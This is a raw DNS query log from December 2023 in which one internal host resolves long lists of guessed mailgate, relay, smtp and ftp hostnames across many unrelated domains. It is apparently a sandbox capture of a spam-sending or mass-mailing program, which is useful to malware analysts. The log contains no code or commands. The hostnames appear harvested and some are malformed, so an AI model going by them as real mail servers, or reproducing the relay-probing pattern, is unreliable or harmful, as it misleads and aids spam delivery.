Dec 22, 2023 21:15:14.798576117 CET	192.168.2.4	1.1.1.1	0x7bf3	Standard query (0)	mailgate.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.842690945 CET	192.168.2.4	1.1.1.1	0x2b39	Standard query (0)	mailgate.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.842690945 CET	192.168.2.4	1.1.1.1	0x6bd1	Standard query (0)	mailgate.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.843597889 CET	192.168.2.4	1.1.1.1	0x3cf7	Standard query (0)	mailgate.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.845561981 CET	192.168.2.4	1.1.1.1	0x2aa1	Standard query (0)	mailgate.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.858051062 CET	192.168.2.4	1.1.1.1	0xde9b	Standard query (0)	mailgate.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.858051062 CET	192.168.2.4	1.1.1.1	0x9a30	Standard query (0)	mailgate.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.858273983 CET	192.168.2.4	1.1.1.1	0x795e	Standard query (0)	mailgate.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.862649918 CET	192.168.2.4	1.1.1.1	0xf2c6	Standard query (0)	mailgate.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.862946033 CET	192.168.2.4	1.1.1.1	0xe9bf	Standard query (0)	mailgate.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.883275986 CET	192.168.2.4	1.1.1.1	0xa458	Standard query (0)	mailgate.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.884625912 CET	192.168.2.4	1.1.1.1	0xdfcc	Standard query (0)	mailgate.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.884861946 CET	192.168.2.4	1.1.1.1	0xa692	Standard query (0)	mailgate.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.893927097 CET	192.168.2.4	1.1.1.1	0xaf2e	Standard query (0)	mailgate.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.914966106 CET	192.168.2.4	1.1.1.1	0xecfd	Standard query (0)	mailgate.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.919838905 CET	192.168.2.4	1.1.1.1	0x1a1b	Standard query (0)	relay.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.951904058 CET	192.168.2.4	1.1.1.1	0x151d	Standard query (0)	mailgate.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.952624083 CET	192.168.2.4	1.1.1.1	0x7bf3	Standard query (0)	mailgate.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.952624083 CET	192.168.2.4	1.1.1.1	0x6b2b	Standard query (0)	mailgate.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.956100941 CET	192.168.2.4	1.1.1.1	0xa386	Standard query (0)	mailgate.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.986970901 CET	192.168.2.4	1.1.1.1	0x2b96	Standard query (0)	mailgate.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.987584114 CET	192.168.2.4	1.1.1.1	0x5f5a	Standard query (0)	mailgate.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.987777948 CET	192.168.2.4	1.1.1.1	0x9d8d	Standard query (0)	mailgate.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.988110065 CET	192.168.2.4	1.1.1.1	0x5c80	Standard query (0)	caribbean360-com.p10.spamhero.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.988957882 CET	192.168.2.4	1.1.1.1	0x777b	Standard query (0)	mailgate.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.989603043 CET	192.168.2.4	1.1.1.1	0x9e87	Standard query (0)	mailgate.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.989816904 CET	192.168.2.4	1.1.1.1	0x71fc	Standard query (0)	mailgate.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.990428925 CET	192.168.2.4	1.1.1.1	0x9b8	Standard query (0)	mailgate.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.998332024 CET	192.168.2.4	1.1.1.1	0xdf80	Standard query (0)	mailgate.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.999356985 CET	192.168.2.4	1.1.1.1	0x3cf7	Standard query (0)	mailgate.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.999356985 CET	192.168.2.4	1.1.1.1	0x2b39	Standard query (0)	mailgate.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.026820898 CET	192.168.2.4	1.1.1.1	0xa9c2	Standard query (0)	mailgate.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.027255058 CET	192.168.2.4	1.1.1.1	0x29ab	Standard query (0)	mailgate.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.028521061 CET	192.168.2.4	1.1.1.1	0x3936	Standard query (0)	mailgate.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.028521061 CET	192.168.2.4	1.1.1.1	0x31fc	Standard query (0)	smtp.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.029495001 CET	192.168.2.4	1.1.1.1	0xd7b9	Standard query (0)	mailgate.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.035598040 CET	192.168.2.4	1.1.1.1	0x22ba	Standard query (0)	relay.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.036755085 CET	192.168.2.4	1.1.1.1	0x6ef2	Standard query (0)	mailgate.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.037123919 CET	192.168.2.4	1.1.1.1	0xff1b	Standard query (0)	mailgate.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.037326097 CET	192.168.2.4	1.1.1.1	0x551b	Standard query (0)	mailgate.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.103359938 CET	192.168.2.4	1.1.1.1	0xade6	Standard query (0)	mailgate.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.109956026 CET	192.168.2.4	1.1.1.1	0xcf57	Standard query (0)	relay.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.138742924 CET	192.168.2.4	1.1.1.1	0x4511	Standard query (0)	mailgate.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.145955086 CET	192.168.2.4	1.1.1.1	0x5c80	Standard query (0)	caribbean360-com.p10.spamhero.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.146455050 CET	192.168.2.4	1.1.1.1	0x9b8	Standard query (0)	mailgate.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.146528006 CET	192.168.2.4	1.1.1.1	0x71fc	Standard query (0)	mailgate.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.146565914 CET	192.168.2.4	1.1.1.1	0x9e87	Standard query (0)	mailgate.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.146605015 CET	192.168.2.4	1.1.1.1	0x2b96	Standard query (0)	mailgate.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.146605015 CET	192.168.2.4	1.1.1.1	0x9d8d	Standard query (0)	mailgate.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.146665096 CET	192.168.2.4	1.1.1.1	0x5f5a	Standard query (0)	mailgate.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.150091887 CET	192.168.2.4	1.1.1.1	0xf904	Standard query (0)	mailgate.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.160407066 CET	192.168.2.4	1.1.1.1	0xffc6	Standard query (0)	mailgate.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.161407948 CET	192.168.2.4	1.1.1.1	0x1960	Standard query (0)	mailgate.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.161611080 CET	192.168.2.4	1.1.1.1	0xf737	Standard query (0)	relay.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.162200928 CET	192.168.2.4	1.1.1.1	0x920f	Standard query (0)	mailgate.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.199681044 CET	192.168.2.4	1.1.1.1	0xd7b9	Standard query (0)	mailgate.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.199681044 CET	192.168.2.4	1.1.1.1	0xa9c2	Standard query (0)	mailgate.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.203753948 CET	192.168.2.4	1.1.1.1	0x31fc	Standard query (0)	smtp.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.203840017 CET	192.168.2.4	1.1.1.1	0x3936	Standard query (0)	mailgate.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.206759930 CET	192.168.2.4	1.1.1.1	0xea9d	Standard query (0)	relay.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.263240099 CET	192.168.2.4	1.1.1.1	0xade6	Standard query (0)	mailgate.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.761882067 CET	192.168.2.4	1.1.1.1	0xe40c	Standard query (0)	mailgate.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.075465918 CET	192.168.2.4	1.1.1.1	0x42b	Standard query (0)	relay.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.141666889 CET	192.168.2.4	1.1.1.1	0xbd54	Standard query (0)	mail.jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.271115065 CET	192.168.2.4	1.1.1.1	0xe4bf	Standard query (0)	relay.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.287503958 CET	192.168.2.4	1.1.1.1	0xe1a3	Standard query (0)	relay.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.300928116 CET	192.168.2.4	1.1.1.1	0xbd54	Standard query (0)	mail.jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.346354008 CET	192.168.2.4	1.1.1.1	0xbd55	Standard query (0)	relay.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.370728970 CET	192.168.2.4	1.1.1.1	0xd3c6	Standard query (0)	mailgate.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.371143103 CET	192.168.2.4	1.1.1.1	0xaa50	Standard query (0)	relay.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.404551029 CET	192.168.2.4	1.1.1.1	0x4138	Standard query (0)	relay.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.407888889 CET	192.168.2.4	1.1.1.1	0x8082	Standard query (0)	relay.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.409502983 CET	192.168.2.4	1.1.1.1	0xa623	Standard query (0)	relay.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.409702063 CET	192.168.2.4	1.1.1.1	0x3a45	Standard query (0)	relay.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.453389883 CET	192.168.2.4	1.1.1.1	0x8740	Standard query (0)	imap.easlab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.454274893 CET	192.168.2.4	1.1.1.1	0xd549	Standard query (0)	relay.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.462110043 CET	192.168.2.4	1.1.1.1	0x5816	Standard query (0)	relay.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.462110043 CET	192.168.2.4	1.1.1.1	0x9f23	Standard query (0)	relay.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.464683056 CET	192.168.2.4	1.1.1.1	0xfd3c	Standard query (0)	relay.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.483242989 CET	192.168.2.4	1.1.1.1	0xcfee	Standard query (0)	relay.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.495696068 CET	192.168.2.4	1.1.1.1	0xbc18	Standard query (0)	relay.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.519350052 CET	192.168.2.4	1.1.1.1	0x1583	Standard query (0)	relay.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.519742012 CET	192.168.2.4	1.1.1.1	0x7549	Standard query (0)	relay.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.558156013 CET	192.168.2.4	1.1.1.1	0xf838	Standard query (0)	relay.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.566509962 CET	192.168.2.4	1.1.1.1	0x3a45	Standard query (0)	relay.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.566579103 CET	192.168.2.4	1.1.1.1	0x8082	Standard query (0)	relay.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.568465948 CET	192.168.2.4	1.1.1.1	0x5b8	Standard query (0)	relay.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.568562031 CET	192.168.2.4	1.1.1.1	0x7207	Standard query (0)	relay.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.588855982 CET	192.168.2.4	1.1.1.1	0xf249	Standard query (0)	relay.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.589138031 CET	192.168.2.4	1.1.1.1	0xa156	Standard query (0)	relay.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.590101004 CET	192.168.2.4	1.1.1.1	0x2561	Standard query (0)	relay.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.596905947 CET	192.168.2.4	1.1.1.1	0x268e	Standard query (0)	relay.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.645471096 CET	192.168.2.4	1.1.1.1	0xcfee	Standard query (0)	relay.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.646018982 CET	192.168.2.4	1.1.1.1	0x5425	Standard query (0)	relay.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.652517080 CET	192.168.2.4	1.1.1.1	0xbc18	Standard query (0)	relay.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.659697056 CET	192.168.2.4	1.1.1.1	0x4228	Standard query (0)	relay.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.671483040 CET	192.168.2.4	1.1.1.1	0x7549	Standard query (0)	relay.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.672908068 CET	192.168.2.4	1.1.1.1	0x8ffc	Standard query (0)	relay.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.672908068 CET	192.168.2.4	1.1.1.1	0x1b6b	Standard query (0)	relay.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.673232079 CET	192.168.2.4	1.1.1.1	0x6c33	Standard query (0)	relay.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.673566103 CET	192.168.2.4	1.1.1.1	0x2fe	Standard query (0)	pop.jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.674746037 CET	192.168.2.4	1.1.1.1	0xa716	Standard query (0)	ssh.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.695998907 CET	192.168.2.4	1.1.1.1	0x775d	Standard query (0)	relay.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.715312004 CET	192.168.2.4	1.1.1.1	0x5b8	Standard query (0)	relay.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.748389959 CET	192.168.2.4	1.1.1.1	0x2561	Standard query (0)	relay.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.748389959 CET	192.168.2.4	1.1.1.1	0xa156	Standard query (0)	relay.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.749450922 CET	192.168.2.4	1.1.1.1	0x5654	Standard query (0)	relay.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.749450922 CET	192.168.2.4	1.1.1.1	0x3de8	Standard query (0)	relay.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.764173031 CET	192.168.2.4	1.1.1.1	0x9e55	Standard query (0)	relay.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.765562057 CET	192.168.2.4	1.1.1.1	0x86c0	Standard query (0)	relay.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.766161919 CET	192.168.2.4	1.1.1.1	0xbaf3	Standard query (0)	relay.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.766549110 CET	192.168.2.4	1.1.1.1	0xf1d2	Standard query (0)	relay.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.766793966 CET	192.168.2.4	1.1.1.1	0x404a	Standard query (0)	relay.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.767009020 CET	192.168.2.4	1.1.1.1	0x1748	Standard query (0)	relay.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.767240047 CET	192.168.2.4	1.1.1.1	0xdbb6	Standard query (0)	mail.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.904846907 CET	192.168.2.4	1.1.1.1	0x4228	Standard query (0)	relay.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.904930115 CET	192.168.2.4	1.1.1.1	0xa716	Standard query (0)	ssh.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.904930115 CET	192.168.2.4	1.1.1.1	0x2fe	Standard query (0)	pop.jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.905010939 CET	192.168.2.4	1.1.1.1	0x3de8	Standard query (0)	relay.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.918833017 CET	192.168.2.4	1.1.1.1	0xdbb6	Standard query (0)	mail.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.918889999 CET	192.168.2.4	1.1.1.1	0x9e55	Standard query (0)	relay.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.918926001 CET	192.168.2.4	1.1.1.1	0x1748	Standard query (0)	relay.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.918926001 CET	192.168.2.4	1.1.1.1	0x404a	Standard query (0)	relay.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.919239998 CET	192.168.2.4	1.1.1.1	0xbaf3	Standard query (0)	relay.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.961705923 CET	192.168.2.4	1.1.1.1	0xf211	Standard query (0)	ftp.keywordranker.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.961705923 CET	192.168.2.4	1.1.1.1	0xdfa	Standard query (0)	ftp.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.963243008 CET	192.168.2.4	1.1.1.1	0xe3fa	Standard query (0)	ftp.customizedperformance.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.963243008 CET	192.168.2.4	1.1.1.1	0x3bcc	Standard query (0)	ftp.yandfcorp.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.963243008 CET	192.168.2.4	1.1.1.1	0x40e9	Standard query (0)	ftp.aikya.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.964502096 CET	192.168.2.4	1.1.1.1	0xc2d6	Standard query (0)	ftp.oljud.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.964502096 CET	192.168.2.4	1.1.1.1	0x7123	Standard query (0)	ftp.yuejichem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.967230082 CET	192.168.2.4	1.1.1.1	0xf1a	Standard query (0)	ftp.ireland-ventures.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.968656063 CET	192.168.2.4	1.1.1.1	0xbf82	Standard query (0)	ftp.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.969278097 CET	192.168.2.4	1.1.1.1	0xfc2a	Standard query (0)	ftp.adelaideclub.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.969710112 CET	192.168.2.4	1.1.1.1	0xe97c	Standard query (0)	ftp.theproducebox.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.970801115 CET	192.168.2.4	1.1.1.1	0xb009	Standard query (0)	ftp.smartiebritches.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.972691059 CET	192.168.2.4	1.1.1.1	0xffa	Standard query (0)	ftp.loghole.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.983239889 CET	192.168.2.4	1.1.1.1	0x1150	Standard query (0)	mx2-us1.ppe-hosted.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.983239889 CET	192.168.2.4	1.1.1.1	0x76d5	Standard query (0)	irelandventures-com01i.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.984245062 CET	192.168.2.4	1.1.1.1	0x87c0	Standard query (0)	viruswall.tvs-e.in	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.987236023 CET	192.168.2.4	1.1.1.1	0xd21b	Standard query (0)	mail.customizedperformance.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:33.988691092 CET	192.168.2.4	1.1.1.1	0xdad6	Standard query (0)	alt3.aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.114851952 CET	192.168.2.4	1.1.1.1	0x63c1	Standard query (0)	mail.smartiebritches.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.115236044 CET	192.168.2.4	1.1.1.1	0x9252	Standard query (0)	yandfcorp-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.115545034 CET	192.168.2.4	1.1.1.1	0x452c	Standard query (0)	mail.intermountainmls.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116116047 CET	192.168.2.4	1.1.1.1	0x176b	Standard query (0)	bldowney.com.2.0001.arsmtp.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116462946 CET	192.168.2.4	1.1.1.1	0xffa	Standard query (0)	ftp.loghole.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116462946 CET	192.168.2.4	1.1.1.1	0x43c9	Standard query (0)	davescheirer-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116508961 CET	192.168.2.4	1.1.1.1	0xfc2a	Standard query (0)	ftp.adelaideclub.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116508961 CET	192.168.2.4	1.1.1.1	0xb009	Standard query (0)	ftp.smartiebritches.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116508961 CET	192.168.2.4	1.1.1.1	0xe3fa	Standard query (0)	ftp.customizedperformance.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116600990 CET	192.168.2.4	1.1.1.1	0xbf82	Standard query (0)	ftp.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116600990 CET	192.168.2.4	1.1.1.1	0xf1a	Standard query (0)	ftp.ireland-ventures.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116626978 CET	192.168.2.4	1.1.1.1	0xf211	Standard query (0)	ftp.keywordranker.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116626978 CET	192.168.2.4	1.1.1.1	0x7123	Standard query (0)	ftp.yuejichem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116626978 CET	192.168.2.4	1.1.1.1	0xdfa	Standard query (0)	ftp.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.116682053 CET	192.168.2.4	1.1.1.1	0xc2d6	Standard query (0)	ftp.oljud.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.117228985 CET	192.168.2.4	1.1.1.1	0xff73	Standard query (0)	racesystems-com-au.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.117624998 CET	192.168.2.4	1.1.1.1	0xbe67	Standard query (0)	mail.keywordranker.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.117732048 CET	192.168.2.4	1.1.1.1	0xef4e	Standard query (0)	mail.jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.118212938 CET	192.168.2.4	1.1.1.1	0x8b0b	Standard query (0)	covicol-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.118616104 CET	192.168.2.4	1.1.1.1	0xd354	Standard query (0)	aspmx3.googlemail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.118848085 CET	192.168.2.4	1.1.1.1	0x14b4	Standard query (0)	pop.eddc.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.119174957 CET	192.168.2.4	1.1.1.1	0xbd33	Standard query (0)	mail.mailbox.lpl.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.120415926 CET	192.168.2.4	1.1.1.1	0xa92	Standard query (0)	spool.mail.gandi.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.120415926 CET	192.168.2.4	1.1.1.1	0xe86d	Standard query (0)	mail.aikya.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.120415926 CET	192.168.2.4	1.1.1.1	0x4283	Standard query (0)	smtp.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.120722055 CET	192.168.2.4	1.1.1.1	0x1a74	Standard query (0)	mail.yuejichem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.121313095 CET	192.168.2.4	1.1.1.1	0xe10f	Standard query (0)	ftp.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.121809006 CET	192.168.2.4	1.1.1.1	0xd9d1	Standard query (0)	ftp.thenile.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.122464895 CET	192.168.2.4	1.1.1.1	0xba48	Standard query (0)	derrickandbriggs-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.122756004 CET	192.168.2.4	1.1.1.1	0x1f12	Standard query (0)	ismaworld-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.123661995 CET	192.168.2.4	1.1.1.1	0xf48e	Standard query (0)	ftp.kegerators.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.123661995 CET	192.168.2.4	1.1.1.1	0x4b19	Standard query (0)	ftp.mcammond.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.123934984 CET	192.168.2.4	1.1.1.1	0x9508	Standard query (0)	ftp.cannaclear.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.124233007 CET	192.168.2.4	1.1.1.1	0x5a9c	Standard query (0)	ftp.jaydien.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.124855995 CET	192.168.2.4	1.1.1.1	0x51ca	Standard query (0)	bethanyhomesnc-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.125253916 CET	192.168.2.4	1.1.1.1	0xa42d	Standard query (0)	mail.loghole.com	A (IP address)	IN (0x0001)	false
